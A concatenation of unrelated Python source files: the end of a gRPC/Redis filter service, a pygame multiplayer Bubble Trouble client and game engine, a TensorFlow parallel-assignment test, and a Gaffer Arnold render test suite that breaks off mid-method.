reqDicts.value = json.dumps({
'user_id': user_id,
'rank_result': rank_result,
'recall_result': recall_result
}).encode('utf-8')
filterProcessRequest = service_pb2.FilterProcessRequest(apiVersion='v1', metadata='Filter', type='FilterResult')
filterProcessRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.FilterProcess(filterProcessRequest)
results = any_pb2.Any()
response.results.Unpack(results)
if response.code==0:
logging.info("filter process succeed, user_id {}".format(user_id))
else:
logging.info("filter process failed, user_id {}, description {}".format(user_id, response.description))
else:
time.sleep( sleep_interval )
except Exception:
localtime = time.asctime( time.localtime(time.time()))
logging.info('Filter process error, time: {}'.format(localtime))
def read_stream_messages():
logging.info('read_stream_messages start')
read_pickle_message()
@xasync
def read_pickle_message():
logging.info('read_pickle_message start')
# Read existed stream message
stream_message = rCache.read_stream_message(pickle_type)
if stream_message:
logging.info("Handle existed stream pickle_type message")
handle_stream_message(stream_message)
while True:
logging.info('wait for reading pickle_type message')
try:
stream_message = rCache.read_stream_message_block(pickle_type)
if stream_message:
handle_stream_message(stream_message)
except redis.ConnectionError:
localtime = time.asctime( time.localtime(time.time()))
logging.info('get ConnectionError, time: {}'.format(localtime))
time.sleep( sleep_interval )
def handle_stream_message(stream_message):
logging.info('get stream message from {}'.format(stream_message))
file_type, file_path, file_list = parse_stream_message(stream_message)
logging.info('start reload data process in handle_stream_message')
logging.info('file_type {}'.format(file_type))
logging.info('file_path {}'.format(file_path))
logging.info('file_list {}'.format(file_list))
reqDicts = any_pb2.Any()
reqDicts.value = json.dumps({
'file_type': file_type,
'file_list': file_list
}).encode('utf-8')
reloadRequest = service_pb2.ReloadRequest()
reloadRequest.dicts.Pack(reqDicts)
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.Reload(reloadRequest)
if response.code == 0:
logging.info('reload plugin succeeded')
else:
logging.info('reload plugin failed, description: {}'.format(response.description))
def parse_stream_message(stream_message):
for stream_name, message in stream_message:
for message_id, value in message:
decode_value = convert(value)
file_type = decode_value['file_type']
file_path = decode_value['file_path']
file_list = decode_value['file_list']
return file_type, file_path, file_list
# convert stream data to str
def convert(data):
if isinstance(data, bytes):
return data.decode('ascii')
elif isinstance(data, dict):
return dict(map(convert, data.items()))
elif isinstance(data, tuple):
return map(convert, data)
else:
return data
def check_plugin_status():
logging.info('check plugin status')
channel = grpc.insecure_channel('localhost:50051')
stub = service_pb2_grpc.FilterStub(channel)
response = stub.Status(service_pb2.google_dot_protobuf_dot_empty__pb2.Empty())
if response.code == 0:
logging.info('plugin startup succeed')
return True
else:
logging.info('plugin startup failed')
return False
def wait_for_plugin_service():
while True:
if check_plugin_status():
return
else:
logging.info('wait for plugin startup')
time.sleep( sleep_interval )
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error("Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var]=os.environ.get(var)
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
logging.info("aws_region={}".format(aws_region))
boto3.setup_default_session(region_name=MANDATORY_ENV_VARS['AWS_REGION'])
global s3client
s3client = boto3.client('s3')
logging.info(json.dumps(s3client.list_buckets(), default=str))
# Initial redis connection
global rCache
rCache = cache.RedisCache(host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
wait_for_plugin_service()
logging.info('filter service start')
poll_rank_notice_to_filter()
read_stream_messages()
if __name__ == "__main__":
print('server start')
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=MANDATORY_ENV_VARS['FILTER_PORT'])
|
window.py
|
import pygame
import pygame_menu
import sys
import time
import queue
import clientNetwork as cn
from threading import Thread
pygame.init()
pygame.display.set_caption('BUBBLE TROUBLE ONLINE')
surface = pygame.display.set_mode((800, 600))
username = 'default'
clock = pygame.time.Clock()
playerId = -1
withId = -1
rivalUsername = 'empty'
port_game = 1
match = False
bgame = None
def getPlayerID():
return playerId
################################################################################
# motor.py #
################################################################################
import json
import random
import math
class BubbleGameConstants:
#####player var const values
player_stable = "stable"
player_moving_right = "right"
player_moving_left = "left"
player_image_height = 37
player_image_width = 23
#speeds
player_speed_pixels = 5
hook_speed_pixels = 15
ball_speed_pixels = 3
hit_jump_pixels = 50
#####protection
player_protection_frames = 100
player_blink_frames = 10
#####life
player_start_life = 5
#####update rate
player_update_per_frames = 5
class BubblePlayer:
#player_x
#player_y
#window_border_left
#window_border_right
player_move = BubbleGameConstants.player_stable
#gameDisplay
player_updated = False
player_shield_active = True
player_protection = BubbleGameConstants.player_protection_frames
player_shield_blink = BubbleGameConstants.player_blink_frames
player_visible = True
is_shooting = False
arrow_size = 0
#arrow_y
arrow_x = 0 #will be overriden, does not really matter
#arrowImg
player_score = 0
player_lifes = BubbleGameConstants.player_start_life
def __init__(self, gamescreen, x, y, img, border_left, border_right, arw_img, player_id):
self.gameDisplay = gamescreen
self.player_x = x
self.player_y = y
self.player_img = img
self.window_border_left = border_left
self.window_border_right = border_right
self.arrow_y = y
self.arrowImg = arw_img
self.playerID = player_id
def activate_player_shield(self):
self.player_shield_active = True
self.player_protection = BubbleGameConstants.player_protection_frames
self.player_shield_blink = BubbleGameConstants.player_blink_frames
self.player_visible = True
def decrease_life(self):
self.player_lifes = self.player_lifes - 1
def iterate_shield_params(self):
self.player_protection = self.player_protection - 1
if self.player_protection <= 0:
self.player_shield_active = False
self.player_visible = True
else:
self.player_shield_blink = self.player_shield_blink - 1
if self.player_shield_blink <= 0:
self.player_shield_blink = BubbleGameConstants.player_blink_frames
if self.player_visible:
self.player_visible = False
else:
self.player_visible = True
def prepare_shooting_msg():
if self.is_shooting:
pack = {'arr_size': self.arrow_size, 'arrx': self.arrow_x, 'arry': self.arrow_y}
return json.dumps(pack)
else:
return None
def prepare_shield_msg():
if self.player_shield_active:
pack = {'prot_time': self.player_protection, 'blink_time': self.player_shield_blink, 'visible': self.player_visible}
return json.dumps(pack)
else:
return None
def send_player_coordinates():
shooting_msg = self.prepare_shooting_msg()
shield_msg = self.prepare_shield_msg()
msg = cn.coordinatesPacket(self.playerID, -1, self.player_x, self.player_move, shooting_msg, shield_msg)
cn.send_udp_packet(msg, cn.udpSocket())
def player_crashed(self):
if not self.player_shield_active:
self.player_lifes = self.player_lifes - 1
self.activate_player_shield()
print("crashed, life remain: "+str(self.player_lifes))
msg = cn.deadPacket(self.playerID, self.player_lifes)
cn.send_udp_packet(msg, cn.udpSocket())
def iterate_arrow(self):
self.arrow_size += BubbleGameConstants.hook_speed_pixels
if (self.arrow_y - self.arrow_size) <= 0:
self.is_shooting = False
def draw_arrow(self, x, y, arrow_size):
self.gameDisplay.blit(pygame.transform.scale(self.arrowImg, (5, arrow_size)), (x,(y-arrow_size)))
def draw_player(self):
if self.player_shield_active:
self.iterate_shield_params()
if self.player_visible:
self.gameDisplay.blit(self.player_img,(self.player_x,self.player_y-BubbleGameConstants.player_image_height))
if self.is_shooting:
self.iterate_arrow()
self.draw_arrow(self.arrow_x, self.arrow_y, self.arrow_size)
def update_player_info(self, x, movement, shooting_msg, shield_msg):
self.player_x = x
self.player_move = movement
if shooting_msg:
self.is_shooting = True
content = json.loads(shooting_msg)
self.arrow_size = content['arr_size']
self.arrow_x = content['arrx']
self.arrow_y = content['arry']
if shield_msg:
self.player_shield_active = True
content = json.loads(shield_msg)
self.player_protection = content['prot_time']
self.player_shield_blink = content['blink_time']
self.player_visible = content['visible']
self.player_updated = True
def calculate_and_change_x(self, x, x_change):
x += x_change
if x < self.window_border_left:
x = self.window_border_left
if x > self.window_border_right:
x = self.window_border_right
return x
def move_player_auto(self):
if not self.player_updated:
if self.player_move == BubbleGameConstants.player_moving_right:
x_change = BubbleGameConstants.player_speed_pixels
elif self.player_move == BubbleGameConstants.player_moving_left:
x_change = -BubbleGameConstants.player_speed_pixels
else:
x_change = 0
self.player_x = self.calculate_and_change_x(self.player_x, x_change)
else:
#Bu frame içerisinde zaten veri update edilmiş harekete gerek yok
self.player_updated = False
#Diğer framede veri güncellenmezse hareket ettirilecek
def shoot(self, x):
self.is_shooting = True
self.arrow_size = BubbleGameConstants.hook_speed_pixels
self.arrow_x = x
def arrow_hit(self):
self.is_shooting = False
self.player_score = self.player_score + 1
class BubbleGame:
######window
#window_height = 600
#window_width = 800
#window_border_left
#window_border_right
#window_border_up
#window_border_down
######colors
white = (255,255,255)
black = (0,0,0)
red = (255,0,0)
green = (0,255,0)
blue = (0,0,255)
bright_red = (255,155,155)
bright_green = (155,255,155)
bright_blue = (155,155,255)
########ball
ball_array = []
######
clock = pygame.time.Clock()
#####math
pi_steps = 50
top_step = pi_steps//2 #zirve noktası
one_step_size = ((math.pi))/pi_steps
#####images
ballImg_red = pygame.image.load('Images/rball6.bmp')
ballImg_orange = pygame.image.load('Images/orange_ball.gif')
ballImg_yellow = pygame.image.load('Images/yellow_ball.gif')
ballImg_green = pygame.image.load('Images/green_ball.gif')
ball_colors = {'red', 'orange', 'yellow', 'green'}
playerImg_1 = pygame.transform.scale(pygame.image.load('Images/player.png'), (BubbleGameConstants.player_image_width, BubbleGameConstants.player_image_height))
playerImg_2 = pygame.transform.scale(pygame.image.load('Images/player2.png'), (BubbleGameConstants.player_image_width, BubbleGameConstants.player_image_height))
arrowImg = pygame.image.load('Images/arrow.png')
#####Ball levels
size_lvl_8 = 135
size_lvl_7 = 95
size_lvl_6 = 70
size_lvl_5 = 55
size_lvl_4 = 40
size_lvl_3 = 27
size_lvl_2 = 18
size_lvl_1 = 10
ball_sizes = [size_lvl_1, size_lvl_2, size_lvl_3, size_lvl_4, size_lvl_5, size_lvl_6, size_lvl_7, size_lvl_8]
high_lvl_8 = 350
high_lvl_7 = 270
high_lvl_6 = 220
high_lvl_5 = 180
high_lvl_4 = 150
high_lvl_3 = 125
high_lvl_2 = 100
high_lvl_1 = 80
high_hit_lvl = 50
ball_highs = [high_lvl_1, high_lvl_2, high_lvl_3, high_lvl_4, high_lvl_5, high_lvl_6, high_lvl_7, high_lvl_8]
#####Players
player_self = None
player_other = None
playerID = -1
send_coordinates = BubbleGameConstants.player_update_per_frames
game_initted = False
def __init__(self, gamedisp, win_height, win_width):
self.gameDisplay = gamedisp
self.window_height = win_height
self.window_width = win_width
self.window_border_left = 0
self.window_border_right = self.window_width
self.window_border_up = 0
self.window_border_down = self.window_height
def balls(self, x, y, color, ball_lvl):
index = ball_lvl - 1
if('red' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_red, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
elif('orange' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_orange, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
elif('yellow' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_yellow, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
elif('green' == color):
self.gameDisplay.blit(pygame.transform.scale(self.ballImg_green, (self.ball_sizes[index], self.ball_sizes[index])), (x,y-self.ball_sizes[index]))
def add_ball(self, x, y, color, ball_level, direction, ball_step, ball_id):
ball_high = self.window_border_down - y
ball_node = []
ball_node.insert(0, x)
ball_node.insert(1, y)
ball_node.insert(2, color)
ball_node.insert(3, ball_level)
ball_node.insert(4, direction)
ball_node.insert(5, ball_high)
ball_node.insert(6, ball_step)#sinüsün neresinde olduğunu gösterir
ball_node.insert(7, ball_id)
self.ball_array.append(ball_node)
def decrease_opponent_life(self):
self.player_other.decrease_life()
def draw_all_balls(self):
if self.ball_array:
for ball_node in self.ball_array:
self.balls(ball_node[0], ball_node[1], ball_node[2], ball_node[3])
def move_balls(self):
if self.ball_array:
for ball_node in self.ball_array:
#update x
ballx = ball_node[0]
ball_direction = ball_node[4]
if ('right' == ball_direction):
ballx = ballx + BubbleGameConstants.ball_speed_pixels
if ballx > self.window_border_right:
dif = ballx - self.window_border_right
ballx = self.window_border_right - dif
ball_node[4] = 'left'
ball_node[0] = ballx
else:
ballx = ballx - BubbleGameConstants.ball_speed_pixels
if ballx < self.window_border_left:
dif = self.window_border_left - ballx
ballx = self.window_border_left + dif
ball_node[4] = 'right'
ball_node[0] = ballx
#update y
index = ball_node[3] - 1 #ball_lvl
bally = ball_node[1]
ball_step = ball_node[6]
ball_high = ball_node[5]
ball_step = ball_step + 1
if ball_step > self.pi_steps:
ball_step = 0
ball_high = self.ball_highs[index]
high_val = ball_high * math.sin(ball_step * self.one_step_size)
bally = self.window_border_down - high_val
ball_node[1] = bally
ball_node[5] = ball_high
ball_node[6] = ball_step
def check_ball_crash(self, playerx, playery, ball_size, centerx, centery):
r = ball_size / 2
if (centery + r) < (playery-BubbleGameConstants.player_image_height):
return False
if (centerx + r) < playerx:
return False
if (centerx - r) > (playerx + BubbleGameConstants.player_image_width):
return False
if centery < (playery-BubbleGameConstants.player_image_height):
locy = (playery-BubbleGameConstants.player_image_height) - centery
x_range = (r * r) - (locy * locy)
if x_range < 0:
#buraya girmemesi lazım
return False
x_range = math.sqrt(x_range)
else:
x_range = r
if (centerx + x_range) < (playerx + BubbleGameConstants.player_image_width) and (centerx + x_range) > playerx:
return True
if (centerx - x_range) < (playerx + BubbleGameConstants.player_image_width) and (centerx - x_range) > playerx:
return True
def check_if_player_crash(self, playerx, playery):
if self.ball_array:
for ball_node in self.ball_array:
ballx = ball_node[0]
bally = ball_node[1]
index = ball_node[3] - 1 #ball_lvl
size = self.ball_sizes[index]
# Ball location
centerx = ballx + size / 2
centery = bally - size / 2
#player location
if self.check_ball_crash(playerx, playery, size, centerx, centery):
return True
#Hiçbir top çarpmamış
return False
def split_the_ball(self, ball_node, left_id, right_id):
self.ball_array.remove(ball_node)
ball_lvl = ball_node[3]
if (ball_lvl > 1):
ball1 = []
ball2 = []
ball_lvl = ball_lvl - 1
ballx = ball_node[0]
bally = ball_node[1] - BubbleGameConstants.hit_jump_pixels
color = ball_node[2]
self.add_ball(ballx, bally, color, ball_lvl, 'right', self.top_step, right_id)
self.add_ball(ballx, bally, color, ball_lvl, 'left', self.top_step, left_id)
#FIXME: response func
def find_and_split_ball(self, removeid, leftid, rightid):
if self.ball_array:
for ball_node in self.ball_array:
if removeid == ball_node[7]:
self.split_the_ball(ball_node, leftid, rightid)
def player_hit_the_ball(self, ball_node):
msg = cn.hitBallPacket(self.playerID, ball_node[7])
cn.send_udp_packet(msg, cn.udpSocket())
def check_if_player_hit_ball(self, hookx, hooky):
if self.ball_array:
for ball_node in self.ball_array:
ballx = ball_node[0]
bally = ball_node[1]
index = ball_node[3] - 1 #ball_lvl
size = self.ball_sizes[index]
# Ball location
centerx = ballx + size / 2
centery = bally - size / 2
r = size / 2
if centery < hooky:
locy = hooky - centery
x_range = (r * r) - (locy* locy)
if x_range < 0:
x_range = 0
x_range = math.sqrt(x_range)
else:
x_range = r
if x_range > 0 and hookx > (centerx - r) and hookx < (centerx + r):
print("centerx: "+str(centerx)+" centery: "+str(centery)+" r: "+str(r)+" x_range: "+str(x_range)+ " hookx: "+str(hookx)+" hooky: "+str(hooky))
self.player_hit_the_ball(ball_node)
return True
return False
def check_and_send_coordinates(self):
self.send_coordinates = self.send_coordinates - 1
if self.send_coordinates <= 0:
self.player_self.send_player_coordinates()
self.send_coordinates = BubbleGameConstants.player_update_per_frames
#FIXME response
def init_bubble_game(self, r_lives, balls, x, rivalx, wait):
y = (self.window_height)
self.playerID = getPlayerID()
self.player_self = BubblePlayer(self.gameDisplay, x, y, self.playerImg_1, self.window_border_left, self.window_border_right, self.arrowImg, self.playerID)
self.player_other = BubblePlayer(self.gameDisplay, rivalx, y, self.playerImg_2, self.window_border_left, self.window_border_right, self.arrowImg, -1)
if balls:
for ball_js in balls:
content = json.loads(shield_msg)
x = content['x']
y = content['y']
ball_level = content['size']
color_num = content['clr']
color = self.ball_colors[color_num]
ball_id = content['ballid']
direction = content['direction']
self.add_ball(x, y, color, ball_level, direction, self.top_step, ball_id)
#FIXME wait:
self.game_initted = True
#FIXME response
def update_opponent_info(self, x, movement, shooting_msg, shield_msg):
self.player_other.update_player_info(self, x, movement, shooting_msg, shield_msg)
def game_loop(self):
while not self.game_initted:
time.sleep(0.1) #oyunun init edilmesi bekleniyor
x = (self.window_width * 0.45)
y = (self.window_height)
x_change = 0
gameExit = False
while not gameExit:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
x_change = -BubbleGameConstants.player_speed_pixels
self.player_self.player_move = BubbleGameConstants.player_moving_left
if event.key == pygame.K_RIGHT:
x_change = BubbleGameConstants.player_speed_pixels
self.player_self.player_move = BubbleGameConstants.player_moving_right
if event.key == pygame.K_UP:
if not self.player_self.is_shooting:
self.player_self.shoot(x)
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
x_change = 0
self.player_self.player_move = BubbleGameConstants.player_stable
self.move_balls()
x = self.player_self.calculate_and_change_x(x, x_change)
self.player_self.player_x = x
is_crashed = self.check_if_player_crash(self.player_self.player_x, self.player_self.player_y)
if is_crashed:
self.player_self.player_crashed()
self.player_other.move_player_auto()
self.gameDisplay.fill(self.white)
self.player_self.draw_player()
self.player_other.draw_player()
if self.player_self.is_shooting:
can_hit = self.check_if_player_hit_ball(self.player_self.arrow_x, self.player_self.arrow_y - self.player_self.arrow_size)
if can_hit:
self.player_self.arrow_hit()
self.draw_all_balls()
pygame.display.update()
self.check_and_send_coordinates()
self.clock.tick(60)
################################################################################
# #
################################################################################
def draw_window():
surface.blit(background, (0, 0))
if player1.lives > 0:
surface.blit(player1.projectile.image, (player1.projectile.x, player1.projectile.y))
surface.blit(player1.image, (player1.x, player1.y))
#also show player2
utility.move_ball(player1.projectile, player2.projectile)
if len(utility.balls) == 0:
print('no balls left.')
player1.hb = (player1.x, player1.y, 23, 37)
player2.hb = (player2.x, player2.y, 23, 37)
for ball in utility.balls:
ball.hb = (ball.x, ball.y, 80, 80)
pygame.display.update()
def levelStart(rivallives, balls, noOfBalls, initialX, r_initialX, wait):
bgame.init_bubble_game(rivallives, balls, initialX, r_initialX, wait)
def matchFound(name, w):
global rivalUsername, withId, match
rivalUsername = name
withId = w
match = True
print('Match!', match)
def forceEnd():
pass
def hitball(remove, left, right):
bgame.find_and_split_ball(remove, left, right)
def setPlayerId(i):
global playerId
playerId = i
def rivalDied():
bgame.decrease_opponent_life()
def updateplayer2(x, dir, shield, shoot):
bgame.update_opponent_info(x, dir, shield, shoot)
def wait_for_match():
Thread(target=cn.listenByTcp, daemon=True).start()
Thread(target=cn.listenByUdp, daemon=True).start()
global surface, match
pleaseWaitDir = 1
pleaseWaitX = 10
pleaseWaitY = 40
counter = 0
font = pygame.font.SysFont('timesnewromanbold',35)
textColor1 = (255, 0, 95)
textColor2 = (10, 10, 10)
img = pygame.image.load('please_wait.jpg')
img = pygame.transform.scale(img, (400,300))
t = font.render('Please wait...', True, (30,30,25))
while not match:
clock.tick(32)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
surface.fill((255,195,47))
if counter % 90 <= 45:
text = font.render('Looking for a match!', True, textColor1)
else:
text = font.render('Looking for a match!', True, textColor2)
if pleaseWaitDir == 1:
pleaseWaitX += 0.70
else:
pleaseWaitX -= 0.70
if pleaseWaitX >= 600 or pleaseWaitX <= 10:
pleaseWaitDir *= -1
surface.blit(text, (250, 200))
surface.blit(img, (200, 250))
surface.blit(t, (pleaseWaitX, pleaseWaitY))
counter += 1
pygame.display.update()
global bgame
bgame = BubbleGame(surface, window_height, window_width)
bgame.game_loop()
def textInputDidChange(value: str) -> None:
global username
username = value
menu = pygame_menu.Menu(height=600,
width=800,
theme=pygame_menu.themes.THEME_ORANGE,
title='Bubble Trouble')
menu.add_text_input('Name: ', onchange=textInputDidChange)
menu.add_button('Start', wait_for_match)
menu.add_button('Quit', pygame_menu.events.EXIT)
menu.add_image('bt.png', scale=(0.7, 0.7), scale_smooth=True)
if __name__ == '__main__':
menu.mainloop(surface)
|
dense_update_ops_no_tsan_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class AssignOpTest(tf.test.TestCase):
# NOTE(mrry): We exclude thess tests from the TSAN TAP target, because they
# contain benign and deliberate data races when multiple threads update
# the same parameters without a lock.
def testParallelUpdateWithoutLocking(self):
with self.test_session() as sess:
ones_t = tf.fill([1024, 1024], 1.0)
p = tf.Variable(tf.zeros([1024, 1024]))
adds = [tf.assign_add(p, ones_t, use_locking=False)
for _ in range(20)]
tf.initialize_all_variables().run()
def run_add(add_op):
sess.run(add_op)
threads = [self.checkedThread(target=run_add, args=(add_op,))
for add_op in adds]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
ones = np.ones((1024, 1024)).astype(np.float32)
self.assertTrue((vals >= ones).all())
self.assertTrue((vals <= ones * 20).all())
def testParallelAssignWithoutLocking(self):
with self.test_session() as sess:
ones_t = tf.fill([1024, 1024], float(1))
p = tf.Variable(tf.zeros([1024, 1024]))
assigns = [tf.assign(p, tf.mul(ones_t, float(i)), False)
for i in range(1, 21)]
tf.initialize_all_variables().run()
def run_assign(assign_op):
sess.run(assign_op)
threads = [self.checkedThread(target=run_assign, args=(assign_op,))
for assign_op in assigns]
for t in threads:
t.start()
for t in threads:
t.join()
vals = p.eval()
# Assert every element is taken from one of the assignments.
self.assertTrue((vals > 0).all())
self.assertTrue((vals <= 20).all())
if __name__ == "__main__":
tf.test.main()
|
ArnoldRenderTest.py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import IECore
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.deregisterAdaptor( "Test" )
def testExecute( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["task"].execute()
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.tif" ) )
def testExecuteWithStringSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["render"] = GafferArnold.ArnoldRender()
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["in"].setInput( s["plane"]["out"] )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
s["fileName"].setValue( self.__scriptFileName )
s.save()
p = subprocess.Popen(
"gaffer execute " + self.__scriptFileName + " -frames 1-3",
shell=True,
stderr = subprocess.PIPE,
)
p.wait()
self.failIf( p.returncode )
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.ass" % i ) )
def testImageOutput( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.####.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
c = Gaffer.Context()
for i in range( 1, 4 ) :
c.setFrame( i )
with c :
s["render"]["task"].execute()
for i in range( 1, 4 ) :
self.failUnless( os.path.exists( self.temporaryDirectory() + "/test.%04d.tif" % i ) )
def testTypeNamePrefixes( self ) :
self.assertTypeNamesArePrefixed( GafferArnold )
self.assertTypeNamesArePrefixed( GafferArnoldTest )
def testDefaultNames( self ) :
self.assertDefaultNamesAreCorrect( GafferArnold )
self.assertDefaultNamesAreCorrect( GafferArnoldTest )
def testNodesConstructWithDefaultValues( self ) :
self.assertNodesConstructWithDefaultValues( GafferArnold )
self.assertNodesConstructWithDefaultValues( GafferArnoldTest )
def testDirectoryCreation( self ) :
s = Gaffer.ScriptNode()
s["variables"].addMember( "renderDirectory", self.temporaryDirectory() + "/renderTests" )
s["variables"].addMember( "assDirectory", self.temporaryDirectory() + "/assTests" )
s["plane"] = GafferScene.Plane()
s["outputs"] = GafferScene.Outputs()
s["outputs"]["in"].setInput( s["plane"]["out"] )
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
"$renderDirectory/test.####.exr",
"exr",
"rgba",
{}
)
)
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
s["render"]["fileName"].setValue( "$assDirectory/test.####.ass" )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertFalse( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
s["fileName"].setValue( self.temporaryDirectory() + "/test.gfr" )
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
# check it can cope with everything already existing
with s.context() :
s["render"]["task"].execute()
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/renderTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests" ) )
self.assertTrue( os.path.exists( self.temporaryDirectory() + "/assTests/test.0001.ass" ) )
def testWedge( self ) :
s = Gaffer.ScriptNode()
s["sphere"] = GafferScene.Sphere()
s["sphere"]["sets"].setValue( "${wedge:value}" )
s["filter"] = GafferScene.SetFilter()
s["filter"]["setExpression"].setValue( "hidden" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["attributes"]["visibility"]["enabled"].setValue( True )
s["attributes"]["attributes"]["visibility"]["value"].setValue( False )
s["attributes"]["filter"].setInput( s["filter"]["out"] )
s["attributes"]["in"].setInput( s["sphere"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
